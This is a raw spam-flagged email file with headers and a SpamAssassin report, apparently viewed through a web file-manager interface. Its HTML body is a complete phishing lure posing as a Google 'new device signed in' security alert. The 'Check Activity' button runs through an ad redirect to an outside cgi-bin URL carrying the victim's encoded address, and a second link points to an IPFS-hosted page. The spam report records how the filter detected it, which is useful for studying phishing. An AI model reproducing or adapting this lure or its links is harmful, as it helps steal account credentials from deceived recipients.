OwlCyberSecurity - MANAGER
Edit File: 1744117273.M586345P3353180.premium128.web-hosting.com,S=8579,W=8730:2,
Return-Path: <a_sawada@sakurai-gs.co.jp> Delivered-To: contact+spam@gourayafroid.com Received: from premium128.web-hosting.com by premium128.web-hosting.com with LMTP id 0AzdHRke9WdcKjMAAvhI2g (envelope-from <a_sawada@sakurai-gs.co.jp>) for <contact+spam@gourayafroid.com>; Tue, 08 Apr 2025 09:01:13 -0400 Return-path: <a_sawada@sakurai-gs.co.jp> Envelope-to: contact@gourayafroid.com Delivery-date: Tue, 08 Apr 2025 09:01:13 -0400 Received: from [36.139.226.177] (port=56751 helo=sakurai-gs.co.jp) by premium128.web-hosting.com with esmtp (Exim 4.98.1) (envelope-from <a_sawada@sakurai-gs.co.jp>) id 1u28Zd-0000000E4gZ-30hW for contact@gourayafroid.com; Tue, 08 Apr 2025 09:01:12 -0400 From: gourayafroid.com <a_sawada@sakurai-gs.co.jp> To: contact@gourayafroid.com Date: 8 Apr 2025 20:59:57 +0800 Message-ID: <20250408205956.A41BB8C0B0707069@sakurai-gs.co.jp> MIME-Version: 1.0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable X-Spam-Status: Yes, score=6.8 X-Spam-Score: 68 X-Spam-Bar: ++++++ X-Spam-Report: Spam detection software, running on the system "premium128.web-hosting.com", has identified this incoming email as possible spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see root\@localhost for details. Content preview: New device signed in to [EMAIL] Your Account was just signed in to a new Windows device. You're getting this email to make sure it was you. Check Activity You can also see security activity Content analysis details: (6.8 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- 0.0 URIBL_BLOCKED ADMINISTRATOR NOTICE: The query to URIBL was blocked. See http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block for more information. [URIs: link.net] 0.1 URIBL_SBL_A Contains URL's A record listed in the Spamhaus SBL blocklist [URIs: ipfs.io] 0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to Validity was blocked. See https://knowledge.validity.com/hc/en-us/articles/20961730681243 for more information. [36.139.226.177 listed in sa-accredit.habeas.com] 1.5 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail) 1.5 SPF_HELO_SOFTFAIL SPF: HELO does not match SPF record (softfail) 0.0 HTML_MESSAGE BODY: HTML included in message 0.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts 0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to Validity was blocked. See https://knowledge.validity.com/hc/en-us/articles/20961730681243 for more information. [36.139.226.177 listed in bl.score.senderscore.com] 0.0 KAM_DMARC_STATUS Test Rule for DKIM or SPF Failure with Strict Alignment 2.0 RDNS_NONE Delivered to internal network by a host with no rDNS 0.0 KAM_SHORT Use of a URL Shortener for very short URL 0.0 T_KAM_HTML_FONT_INVALID Test for Invalidly Named or Formatted Colors in HTML 0.0 URI_IPFSIO References Interplanetary File System PtP content via ipfs.io, likely phishing 0.9 PDS_FROM_NAME_TO_DOMAIN From:name looks like To:domain 0.6 PDS_FRNOM_TODOM_NAKED_TO Naked to From name equals to Domain 0.0 URI_IPFS References Interplanetary File System PtP content, probable phishing 0.0 PDS_FRNOM_TODOM_DBL_URL From Name to domain, double URL 0.0 TO_NO_BRKTS_NORDNS_HTML To: lacks brackets and no rDNS and HTML only X-Spam-Flag: YES Subject: ***SPAM*** Important Notice - New Device Signed In <html><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset= =3Diso-8859-1"> <title></title> <meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3Dedge"> </head> <body style=3D"margin: 0.5em;"> <div align=3D"center" style=3D"padding: 40px 20px; border-radius: 8px; bord= er: thin solid rgb(218, 220, 224); border-image: none; color: rgb(34, 34, 3= 4); text-transform: none; text-indent: 0px; letter-spacing: normal; font-fa= mily: Arial, Helvetica, sans-serif; font-size: small; font-style: normal; f= ont-weight: 400; word-spacing: 0px; white-space: normal; box-sizing: border= -box; orphans: 2; widows: 2; -webkit-text-stroke-width: 0px; text-decoratio= n-thickness: initial; text-decoration-style: initial;=20 text-decoration-color: initial; font-variant-ligatures: normal; font-varian= t-caps: normal;"> <div style=3D"line-height: 32px; padding-bottom: 24px; border-bottom-color:= rgb(218, 220, 224); border-bottom-width: thin; border-bottom-style: solid;= box-sizing: border-box;"> <div style=3D"box-sizing: border-box;"><span style=3D'font-family: "Google = Sans", Roboto, RobotoDraft, Helvetica, Arial, sans-serif; font-size: 24px;'= >New=20 device signed in to <b>[EMAIL]</b></span></div><br style=3D"box-s= izing: border-box;"></div> <div style=3D"line-height: 20px; padding-top: 20px; font-family: Roboto-Reg= ular, Helvetica, Arial, sans-serif; box-sizing: border-box;"><span style=3D= "font-size: 14px; box-sizing: border-box;">Your Account was just signed in= =20 to a new Windows device. You're getting this email to make sure it was=20 you.</span> <div style=3D"padding-top: 32px; box-sizing: border-box;"> <a style=3D'padding: 10px 24px; border-radius: 5px; color: rgb(255, 255, 25= 5); line-height: 16px; font-family: "Google Sans", Roboto, RobotoDraft, Hel= vetica, Arial, sans-serif; display: inline-block; min-width: 90px; box-sizi= ng: border-box; background-color: rgb(65, 132, 243); text-decoration-line: = none;'=20 href=3D"https://ad.doubleclick.net/ddm/trackclk/N4892.5020.4774291382421/B2= 3999293.271539123;dc_trk_aid=3D466016770;dc_trk_cid=3D131101292;dc_lat=3D;d= c_rdid=3D;tag_for_child_directed_treatment=3D;tfua=3D?https://grupogyv.com.= co/max/cgi-bin?email=3DY29udGFjdEBnb3VyYXlhZnJvaWQuY29t" target=3D"_blank" = rel=3D"noreferrer"=20 data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://ipfs.io/ipfs= /QmeYTsM5YN8b5ySGxfZ3sRkGQb5jveGwX9bx4mAKAaWMa9?filename%3Dnorton.html%23za= vir@zavir.com&source=3Dgmail&ust=3D1719300883107000&usg=3DAOvVa= w0RBFwd1muicCNFGly5GlgT">Check=20 Activity</a></div></div> <div style=3D"color: rgb(95, 99, 104); line-height: 16px; letter-spacing: 0= px; padding-top: 20px; font-size: 12px; box-sizing: border-box;">You=20 can also see security activity<br style=3D"box-sizing: border-box;"> <= /div></div> <div style=3D"color: rgb(34, 34, 34); text-transform: none; text-indent: 0p= x; letter-spacing: normal; font-family: Arial, Helvetica, sans-serif; font-= size: small; font-style: normal; font-weight: 400; word-spacing: 0px; white= -space: normal; box-sizing: border-box; orphans: 2; widows: 2; -webkit-text= -stroke-width: 0px; text-decoration-thickness: initial; text-decoration-sty= le: initial; text-decoration-color: initial; font-variant-ligatures: normal= ; font-variant-caps: normal;"> <div style=3D"line-height: 18px; padding-top: 12px; font-family: Roboto-Reg= ular, Helvetica, Arial, sans-serif; font-size: 11px; box-sizing: border-box= ;"> <div style=3D"box-sizing: border-box;">You received this email to let you k= now=20 about important changes to your <font color=3D"#1155cc">[EMail]</font>= Account and services.</div> <div style=3D"direction: ltr; box-sizing: border-box;">© 2025 <a = style=3D"color: rgb(17, 85, 204); box-sizing: border-box; background-color:= transparent; text-decoration-line: none;" href=3D"http://link.net/" target= =3D"_blank" rel=3D"noreferrer" data-saferedirecturl=3D"https://www.google.c= om/url?q=3Dhttp://link.net/&source=3Dgmail&ust=3D1719300883107000&a= mp;usg=3DAOvVaw05wnyog6eBZtqJe7hf3fvc">link.net</a> LLC, <a style=3D"line-height: 18px; padding-top: 12px; box= -sizing: border-box; background-color: transparent;">=20 1600 Amphitheatre Parkway, Mountain View, CA 94043,=20 USA</a></div></div></div></body></html>